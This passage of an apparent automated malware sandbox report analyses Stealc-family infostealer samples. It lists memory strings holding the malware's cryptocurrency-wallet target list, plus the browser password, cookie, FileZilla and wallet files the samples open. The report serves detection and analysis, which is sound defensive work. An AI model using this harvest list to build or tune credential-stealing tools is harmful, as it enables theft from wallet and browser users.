Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001010000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001081000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.json
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001010000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001010000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ExodusE#
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001081000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp.B
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: EthereumE#
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001010000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001081000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Coinomi\Coinomi\wallets\\*.*\]
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001081000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\MultiDoge\\multidoge.wallet
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001081000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.json
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001010000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001010000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001081000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\*.*
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001081000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\*.*
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
